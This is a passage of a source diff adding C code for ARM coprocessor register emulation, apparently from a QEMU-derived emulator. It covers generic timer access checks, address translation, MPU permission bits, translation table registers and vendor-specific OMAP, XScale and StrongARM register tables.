"TPIDRURO", 15,13,0, 0,0,3, 0, + 0, PL0_R|PL1_W, NULL, 0, offsetoflow32(CPUARMState, cp15.tpidrro_el0), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "TPIDR_EL1", 0,13,0, 3,0,4, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.tpidr_el1), }, + REGINFO_SENTINEL +}; + +#ifndef CONFIG_USER_ONLY + +static CPAccessResult gt_cntfrq_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* CNTFRQ: not visible from PL0 if both PL0PCTEN and PL0VCTEN are zero */ + if (arm_current_el(env) == 0 && !extract32(env->cp15.c14_cntkctl, 0, 2)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static CPAccessResult gt_counter_access(CPUARMState *env, int timeridx) +{ + /* CNT[PV]CT: not visible from PL0 if ELO[PV]CTEN is zero */ + if (arm_current_el(env) == 0 && + !extract32(env->cp15.c14_cntkctl, timeridx, 1)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static CPAccessResult gt_timer_access(CPUARMState *env, int timeridx) +{ + /* CNT[PV]_CVAL, CNT[PV]_CTL, CNT[PV]_TVAL: not visible from PL0 if + * EL0[PV]TEN is zero. 
+ */ + if (arm_current_el(env) == 0 && + !extract32(env->cp15.c14_cntkctl, 9 - timeridx, 1)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static CPAccessResult gt_pct_access(CPUARMState *env, + const ARMCPRegInfo *ri) +{ + return gt_counter_access(env, GTIMER_PHYS); +} + +static CPAccessResult gt_vct_access(CPUARMState *env, + const ARMCPRegInfo *ri) +{ + return gt_counter_access(env, GTIMER_VIRT); +} + +static CPAccessResult gt_ptimer_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return gt_timer_access(env, GTIMER_PHYS); +} + +static CPAccessResult gt_vtimer_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return gt_timer_access(env, GTIMER_VIRT); +} + +static uint64_t gt_get_countervalue(CPUARMState *env) +{ + return qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / GTIMER_SCALE; +} + +static void gt_recalc_timer(ARMCPU *cpu, int timeridx) +{ + ARMGenericTimer *gt = &cpu->env.cp15.c14_timer[timeridx]; + + if (gt->ctl & 1) { + /* Timer enabled: calculate and set current ISTATUS, irq, and + * reset timer to when ISTATUS next has to change + */ + uint64_t count = gt_get_countervalue(&cpu->env); + /* Note that this must be unsigned 64 bit arithmetic: */ + int istatus = count >= gt->cval; + uint64_t nexttick; + + gt->ctl = deposit32(gt->ctl, 2, 1, istatus); + //qemu_set_irq(cpu->gt_timer_outputs[timeridx], + // (istatus && !(gt->ctl & 2))); + if (istatus) { + /* Next transition is when count rolls back over to zero */ + nexttick = UINT64_MAX; + } else { + /* Next transition is when we hit cval */ + nexttick = gt->cval; + } + /* Note that the desired next expiry time might be beyond the + * signed-64-bit range of a QEMUTimer -- in this case we just + * set the timer for as far in the future as possible. When the + * timer expires we will reset the timer for any remaining period. 
+ */ + if (nexttick > INT64_MAX / GTIMER_SCALE) { + nexttick = INT64_MAX / GTIMER_SCALE; + } + //timer_mod(cpu->gt_timer[timeridx], nexttick); + } else { + /* Timer disabled: ISTATUS and timer output always clear */ + gt->ctl &= ~4; + //qemu_set_irq(cpu->gt_timer_outputs[timeridx], 0); + //timer_del(cpu->gt_timer[timeridx]); + } +} + +static void gt_cnt_reset(CPUARMState *env, const ARMCPRegInfo *ri) +{ +} + +static uint64_t gt_cnt_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return gt_get_countervalue(env); +} + +static void gt_cval_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + int timeridx = ri->opc1 & 1; + + env->cp15.c14_timer[timeridx].cval = value; + //gt_recalc_timer(arm_env_get_cpu(env), timeridx); +} + +static uint64_t gt_tval_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + int timeridx = ri->crm & 1; + + return (uint32_t)(env->cp15.c14_timer[timeridx].cval - + gt_get_countervalue(env)); +} + +static void gt_tval_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + int timeridx = ri->crm & 1; + + env->cp15.c14_timer[timeridx].cval = gt_get_countervalue(env) + + + sextract64(value, 0, 32); + gt_recalc_timer(arm_env_get_cpu(env), timeridx); +} + +static void gt_ctl_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int timeridx = ri->crm & 1; + uint32_t oldval = env->cp15.c14_timer[timeridx].ctl; + + env->cp15.c14_timer[timeridx].ctl = deposit64(oldval, 0, 2, value); + if ((oldval ^ value) & 1) { + /* Enable toggled */ + gt_recalc_timer(cpu, timeridx); + } else if ((oldval ^ value) & 2) { + /* IMASK toggled: don't need to recalculate, + * just set the interrupt line based on ISTATUS + */ + //qemu_set_irq(cpu->gt_timer_outputs[timeridx], + // (oldval & 4) && !(value & 2)); + } +} + +void arm_gt_ptimer_cb(void *opaque) +{ + ARMCPU *cpu = opaque; + + gt_recalc_timer(cpu, GTIMER_PHYS); +} + +void arm_gt_vtimer_cb(void *opaque) +{ + ARMCPU *cpu = 
opaque; + + gt_recalc_timer(cpu, GTIMER_VIRT); +} + +static const ARMCPRegInfo generic_timer_cp_reginfo[] = { + /* Note that CNTFRQ is purely reads-as-written for the benefit + * of software; writing it doesn't actually change the timer frequency. + * Our reset value matches the fixed frequency we implement the timer at. + */ + { "CNTFRQ", 15,14,0, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetoflow32(CPUARMState, cp15.c14_cntfrq), + gt_cntfrq_access, NULL,NULL, NULL,NULL, arm_cp_reset_ignore, }, + { "CNTFRQ_EL0", 0,14,0, 3,3,0, ARM_CP_STATE_AA64, + 0, PL1_RW | PL0_R, NULL, (1000 * 1000 * 1000) / GTIMER_SCALE, offsetof(CPUARMState, cp15.c14_cntfrq), + gt_cntfrq_access, }, + /* overall control: mostly access permissions */ + { "CNTKCTL", 0,14,1, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c14_cntkctl), }, + /* per-timer control */ + { "CNTP_CTL", 15,14,2, 0,0,1, 0, + ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), + gt_ptimer_access, NULL, gt_ctl_write, NULL,raw_write, arm_cp_reset_ignore, }, + { "CNTP_CTL_EL0", 0,14,2, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].ctl), + gt_ptimer_access, NULL,gt_ctl_write, NULL,raw_write, }, + { "CNTV_CTL", 15,14,3, 0,0,1, 0, + ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetoflow32(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), + gt_vtimer_access, NULL,gt_ctl_write, NULL,raw_write, arm_cp_reset_ignore, }, + { "CNTV_CTL_EL0", 0,14,3, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].ctl), + gt_vtimer_access, NULL,gt_ctl_write, NULL,raw_write, }, + /* TimerValue views: a 32 bit downcounting view of the underlying state */ + { "CNTP_TVAL", 15,14,2, 0,0,0, 0, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + gt_ptimer_access, gt_tval_read, gt_tval_write, }, + { 
"CNTP_TVAL_EL0", 0,14,2, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + NULL, gt_tval_read, gt_tval_write, }, + { "CNTV_TVAL", 15,14,3, 0,0,0, 0, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + gt_vtimer_access, gt_tval_read, gt_tval_write, }, + { "CNTV_TVAL_EL0", 0,14,3, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, 0, + NULL, gt_tval_read, gt_tval_write, }, + /* The counter itself */ + { "CNTPCT", 15,0,14, 0,0, 0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_pct_access, gt_cnt_read,NULL, NULL,NULL, arm_cp_reset_ignore, }, + { "CNTPCT_EL0", 0,14,0, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_pct_access, gt_cnt_read, NULL, NULL, NULL, gt_cnt_reset, }, + { "CNTVCT", 15,0,14, 0,1,0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_vct_access, gt_cnt_read,NULL, NULL,NULL, arm_cp_reset_ignore, }, + { "CNTVCT_EL0", 0,14,0, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE | ARM_CP_IO, PL0_R, NULL, 0, 0, + gt_vct_access, gt_cnt_read, NULL, NULL,NULL, gt_cnt_reset, }, + /* Comparison value, indicating when the timer goes off */ + { "CNTP_CVAL", 15, 0,14, 0,2, 0, 0, + ARM_CP_64BIT | ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), + gt_ptimer_access, NULL, gt_cval_write, NULL, raw_write, arm_cp_reset_ignore, }, + { "CNTP_CVAL_EL0", 0,14,2, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), + gt_vtimer_access, NULL, gt_cval_write, NULL, raw_write, }, + { "CNTV_CVAL", 15, 0,14, 0,3,0, 0, + ARM_CP_64BIT | ARM_CP_IO | ARM_CP_NO_MIGRATE, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), + gt_vtimer_access, NULL, gt_cval_write, NULL, raw_write, arm_cp_reset_ignore, }, + { "CNTV_CVAL_EL0", 0,14,3, 3,3,2, ARM_CP_STATE_AA64, + 
ARM_CP_IO, PL1_RW | PL0_R, NULL, 0, offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), + gt_vtimer_access, NULL, gt_cval_write, NULL, raw_write, }, + REGINFO_SENTINEL +}; + +#else +/* In user-mode none of the generic timer registers are accessible, + * and their implementation depends on QEMU_CLOCK_VIRTUAL and qdev gpio outputs, + * so instead just don't register any of them. + */ +static const ARMCPRegInfo generic_timer_cp_reginfo[] = { + REGINFO_SENTINEL +}; + +#endif + +static void par_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + if (arm_feature(env, ARM_FEATURE_LPAE)) { + raw_write(env, ri, value); + } else if (arm_feature(env, ARM_FEATURE_V7)) { + raw_write(env, ri, value & 0xfffff6ff); + } else { + raw_write(env, ri, value & 0xfffff1ff); + } +} + +#ifndef CONFIG_USER_ONLY +/* get_phys_addr() isn't present for user-mode-only targets */ + +static CPAccessResult ats_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (ri->opc2 & 4) { + /* Other states are only available with TrustZone; in + * a non-TZ implementation these registers don't exist + * at all, which is an Uncategorized trap. This underdecoding + * is safe because the reginfo is NO_MIGRATE. + */ + return CP_ACCESS_TRAP_UNCATEGORIZED; + } + return CP_ACCESS_OK; +} + +static void ats_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + hwaddr phys_addr; + target_ulong page_size; + int prot; + int ret, is_user = ri->opc2 & 2; + int access_type = ri->opc2 & 1; + + ret = get_phys_addr(env, value, access_type, is_user, + &phys_addr, &prot, &page_size); + if (extended_addresses_enabled(env)) { + /* ret is a DFSR/IFSR value for the long descriptor + * translation table format, but with WnR always clear. + * Convert it to a 64-bit PAR. + */ + uint64_t par64 = (1 << 11); /* LPAE bit always set */ + if (ret == 0) { + par64 |= phys_addr & ~0xfffULL; + /* We don't set the ATTR or SH fields in the PAR. 
*/ + } else { + par64 |= 1; /* F */ + par64 |= (ret & 0x3f) << 1; /* FS */ + /* Note that S2WLK and FSTAGE are always zero, because we don't + * implement virtualization and therefore there can't be a stage 2 + * fault. + */ + } + env->cp15.par_el1 = par64; + } else { + /* ret is a DFSR/IFSR value for the short descriptor + * translation table format (with WnR always clear). + * Convert it to a 32-bit PAR. + */ + if (ret == 0) { + /* We do not set any attribute bits in the PAR */ + if (page_size == (1 << 24) + && arm_feature(env, ARM_FEATURE_V7)) { + env->cp15.par_el1 = (phys_addr & 0xff000000) | 1 << 1; + } else { + env->cp15.par_el1 = phys_addr & 0xfffff000; + } + } else { + env->cp15.par_el1 = ((ret & (1 << 10)) >> 5) | + ((ret & (1 << 12)) >> 6) | + ((ret & 0xf) << 1) | 1; + } + } +} +#endif + +static const ARMCPRegInfo vapa_cp_reginfo[] = { + { "PAR", 15,7,4, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.par_el1), + NULL, NULL, par_write }, +#ifndef CONFIG_USER_ONLY + { "ATS", 15,7,8, 0,0,CP_ANY, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + ats_access, NULL, ats_write }, +#endif + REGINFO_SENTINEL +}; + +/* Return basic MPU access permission bits. */ +static uint32_t simple_mpu_ap_bits(uint32_t val) +{ + uint32_t ret; + uint32_t mask; + int i; + ret = 0; + mask = 3; + for (i = 0; i < 16; i += 2) { + ret |= (val >> i) & mask; + mask <<= 2; + } + return ret; +} + +/* Pad basic MPU access permission bits to extended format. 
*/ +static uint32_t extended_mpu_ap_bits(uint32_t val) +{ + uint32_t ret; + uint32_t mask; + int i; + ret = 0; + mask = 3; + for (i = 0; i < 16; i += 2) { + ret |= (val & mask) << i; + mask <<= 2; + } + return ret; +} + +static void pmsav5_data_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.pmsav5_data_ap = extended_mpu_ap_bits(value); +} + +static uint64_t pmsav5_data_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return simple_mpu_ap_bits(env->cp15.pmsav5_data_ap); +} + +static void pmsav5_insn_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.pmsav5_insn_ap = extended_mpu_ap_bits(value); +} + +static uint64_t pmsav5_insn_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return simple_mpu_ap_bits(env->cp15.pmsav5_insn_ap); +} + +static const ARMCPRegInfo pmsav5_cp_reginfo[] = { + { "DATA_AP", 15,5,0, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_data_ap), + NULL, pmsav5_data_ap_read, pmsav5_data_ap_write, }, + { "INSN_AP", 15,5,0, 0,0,1, 0, + ARM_CP_NO_MIGRATE,PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_insn_ap), + NULL, pmsav5_insn_ap_read, pmsav5_insn_ap_write, }, + { "DATA_EXT_AP", 15,5,0, 0,0,2, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_data_ap), }, + { "INSN_EXT_AP", 15,5,0, 0,0,3, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.pmsav5_insn_ap), }, + { "DCACHE_CFG", 15,2,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c2_data), }, + { "ICACHE_CFG", 15,2,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c2_insn), }, + /* Protection region base and size registers */ + { "946_PRBS0", 15,6,0, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[0]) }, + { "946_PRBS1", 15,6,1, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[1]) }, + { "946_PRBS2", 15,6,2, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[2]) }, + { 
"946_PRBS3", 15,6,3, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[3]) }, + { "946_PRBS4", 15,6,4, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[4]) }, + { "946_PRBS5", 15,6,5, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[5]) }, + { "946_PRBS6", 15,6,6, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[6]) }, + { "946_PRBS7", 15,6,7, 0,0,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c6_region[7]) }, + REGINFO_SENTINEL +}; + +static void vmsa_ttbcr_raw_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + int maskshift = extract32(value, 0, 3); + + if (!arm_feature(env, ARM_FEATURE_V8)) { + if (arm_feature(env, ARM_FEATURE_LPAE) && (value & TTBCR_EAE)) { + /* Pre ARMv8 bits [21:19], [15:14] and [6:3] are UNK/SBZP when + * using Long-desciptor translation table format */ + value &= ~((7 << 19) | (3 << 14) | (0xf << 3)); + } else if (arm_feature(env, ARM_FEATURE_EL3)) { + /* In an implementation that includes the Security Extensions + * TTBCR has additional fields PD0 [4] and PD1 [5] for + * Short-descriptor translation table format. + */ + value &= TTBCR_PD1 | TTBCR_PD0 | TTBCR_N; + } else { + value &= TTBCR_N; + } + } + + /* Note that we always calculate c2_mask and c2_base_mask, but + * they are only used for short-descriptor tables (ie if EAE is 0); + * for long-descriptor tables the TTBCR fields are used differently + * and the c2_mask and c2_base_mask values are meaningless. + */ + raw_write(env, ri, value); + env->cp15.c2_mask = ~(((uint32_t)0xffffffffu) >> maskshift); + env->cp15.c2_base_mask = ~((uint32_t)0x3fffu >> maskshift); +} + +static void vmsa_ttbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (arm_feature(env, ARM_FEATURE_LPAE)) { + /* With LPAE the TTBCR could result in a change of ASID + * via the TTBCR.A1 bit, so do a TLB flush. 
+ */ + tlb_flush(CPU(cpu), 1); + } + vmsa_ttbcr_raw_write(env, ri, value); +} + +static void vmsa_ttbcr_reset(CPUARMState *env, const ARMCPRegInfo *ri) +{ + env->cp15.c2_base_mask = 0xffffc000u; + raw_write(env, ri, 0); + env->cp15.c2_mask = 0; +} + +static void vmsa_tcr_el1_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + /* For AArch64 the A1 bit could result in a change of ASID, so TLB flush. */ + tlb_flush(CPU(cpu), 1); + raw_write(env, ri, value); +} + +static void vmsa_ttbr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* 64 bit accesses to the TTBRs can change the ASID and so we + * must flush the TLB. + */ + if (cpreg_field_is_64bit(ri)) { + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush(CPU(cpu), 1); + } + raw_write(env, ri, value); +} + +static const ARMCPRegInfo vmsa_cp_reginfo[] = { + { "DFSR", 15,5,0, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.esr_el[1]), + NULL,NULL,NULL,NULL,NULL, arm_cp_reset_ignore, }, + { "IFSR", 15,5,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ifsr_el2), }, + { "ESR_EL1", 0,5,2, 3,0,0, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.esr_el[1]), }, + { "TTBR0_EL1", 0,2,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr0_el1), + NULL, NULL, vmsa_ttbr_write, }, + { "TTBR1_EL1", 0,2,0, 3,0,1, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr1_el1), + NULL, NULL, vmsa_ttbr_write, }, + { "TCR_EL1", 0,2,0, 3,0,2, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c2_control), + NULL, NULL,vmsa_tcr_el1_write, NULL,raw_write, vmsa_ttbcr_reset, }, + { "TTBCR", 15,2,0, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c2_control), + NULL, NULL, vmsa_ttbcr_write, NULL, vmsa_ttbcr_raw_write, arm_cp_reset_ignore, }, + /* 64-bit FAR; this entry also gives us the AArch32 DFAR */ + { 
"FAR_EL1", 0,6,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.far_el[1]), }, + REGINFO_SENTINEL +}; + +static void omap_ticonfig_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c15_ticonfig = value & 0xe7; + /* The OS_TYPE bit in this register changes the reported CPUID! */ + env->cp15.c0_cpuid = (value & (1 << 5)) ? + ARM_CPUID_TI915T : ARM_CPUID_TI925T; +} + +static void omap_threadid_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c15_threadid = value & 0xffff; +} + +static void omap_wfi_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Wait-for-interrupt (deprecated) */ + cpu_interrupt(CPU(arm_env_get_cpu(env)), CPU_INTERRUPT_HALT); +} + +static void omap_cachemaint_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* On OMAP there are registers indicating the max/min index of dcache lines + * containing a dirty line; cache flush operations have to reset these. 
+ */ + env->cp15.c15_i_max = 0x000; + env->cp15.c15_i_min = 0xff0; +} + +static const ARMCPRegInfo omap_cp_reginfo[] = { + { "DFSR", 15,5,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_OVERRIDE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.esr_el[1]), }, + { "", 15,15,0, 0,0,0, 0, + ARM_CP_NOP, PL1_RW, NULL, 0, 0, }, + { "TICONFIG", 15,15,1, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_ticonfig), + NULL, NULL, omap_ticonfig_write }, + { "IMAX", 15,15,2, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_i_max), }, + { "IMIN", 15,15,3, 0,0,0, 0, + 0, PL1_RW, NULL, 0xff0, offsetof(CPUARMState, cp15.c15_i_min) }, + { "THREADID", 15,15,4, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_threadid), + NULL, NULL, omap_threadid_write }, + { "TI925T_STATUS", 15,15,8, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, 0, + NULL, arm_cp_read_zero, omap_wfi_write, }, + /* TODO: Peripheral port remap register: + * On OMAP2 mcr p15, 0, rn, c15, c2, 4 sets up the interrupt controller + * base address at $rn & ~0xfff and map size of 0x200 << ($rn & 0xfff), + * when MMU is off. + */ + { "OMAP_CACHEMAINT", 15,7,CP_ANY, 0,0,CP_ANY, 0, + ARM_CP_OVERRIDE | ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, omap_cachemaint_write }, + { "C9", 15,9,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_OVERRIDE, PL1_RW, NULL, 0, 0, }, + REGINFO_SENTINEL +}; + +static void xscale_cpar_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c15_cpar = value & 0x3fff; +} + +static const ARMCPRegInfo xscale_cp_reginfo[] = { + { "XSCALE_CPAR", 15,15,1, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c15_cpar), + NULL, NULL, xscale_cpar_write, }, + { "XSCALE_AUXCR", 15,1,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c1_xscaleauxcr), }, + /* XScale specific cache-lockdown: since we have no cache we NOP these + * and hope the guest does not really rely on cache behaviour. 
+ */ + { "XSCALE_LOCK_ICACHE_LINE", 15,9,1, 0,0,0, 0, + ARM_CP_NOP, PL1_W }, + { "XSCALE_UNLOCK_ICACHE", 15,9,1, 0,0,1, 0, + ARM_CP_NOP, PL1_W, }, + { "XSCALE_DCACHE_LOCK", 15,9,2, 0,0,0, 0, + ARM_CP_NOP, PL1_RW }, + { "XSCALE_UNLOCK_DCACHE", 15,9,2, 0,0,1, 0, + ARM_CP_NOP, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo dummy_c15_cp_reginfo[] = { + /* RAZ/WI the whole crn=15 space, when we don't have a more specific + * implementation of this implementation-defined space. + * Ideally this should eventually disappear in favour of actually + * implementing the correct behaviour for all cores. + */ + { "C15_IMPDEF", 15,15,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE | ARM_CP_OVERRIDE, PL1_RW, NULL, 0 }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo cache_dirty_status_cp_reginfo[] = { + /* Cache status: RAZ because we have no cache so it's always clean */ + { "CDSR", 15,7,10, 0,0,6, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL1_R, NULL, 0 }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo cache_block_ops_cp_reginfo[] = { + /* We never have a a block transfer operation in progress */ + { "BXSR", 15,7,12, 0,0,4, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL0_R, NULL, 0 }, + /* The cache ops themselves: these all NOP for QEMU */ + { "IICR", 15, 0,5, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL1_W }, + { "IDCR", 15, 0,6, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL1_W, }, + { "CDCR", 15, 0,12, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL0_W, }, + { "PIR", 15, 0,12, 0,1, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL0_W, }, + { "PDR", 15, 0,12, 0,2, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL0_W, }, + { "CIDCR", 15, 0,14, 0,0, 0, 0, + ARM_CP_NOP|ARM_CP_64BIT, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo cache_test_clean_cp_reginfo[] = { + /* The cache test-and-clean instructions always return (1 << 30) + * to indicate that there are no dirty cache lines. 
+ */ + { "TC_DCACHE", 15,7,10, 0,0,3, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL0_R, NULL, (1 << 30) }, + { "TCI_DCACHE", 15,7,14, 0,0,3, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL0_R, NULL, (1 << 30) }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo strongarm_cp_reginfo[] = { + /* Ignore ReadBuffer accesses */ + { "C9_READBUFFER", 15,9,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_OVERRIDE | ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, }, + REGINFO_SENTINEL +}; + +static uint64_t mpidr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + uint32_t mpidr = cs->cpu_index; + /* We don't support setting cluster ID ([8..11]) (known as Aff1 + * in later ARM ARM versions), or any of the higher affinity level fields, + * so these bits always RAZ. + */ + if (arm_feature(env, ARM_FEATURE_V7MP)) { + mpidr |= (1U << 31); + /* Cores which are uniprocessor (non-coherent) + * but still implement the MP extensions set + * bit 30. (For instance, A9UP.) However we do + * not currently model any of those cores. + */ + } + return mpidr; +} + +static const ARMCPRegInfo mpidr_cp_reginfo[] = { + { "MPIDR", 0,0,0, 3,0,5, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, 0, + NULL, mpidr_read, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo lpae_cp_reginfo[] = { + /* NOP AMAIR0/1: the override is because these clash with the rather + * broadly specified TLB_LOCKDOWN entry in the generic cp_reginfo. 
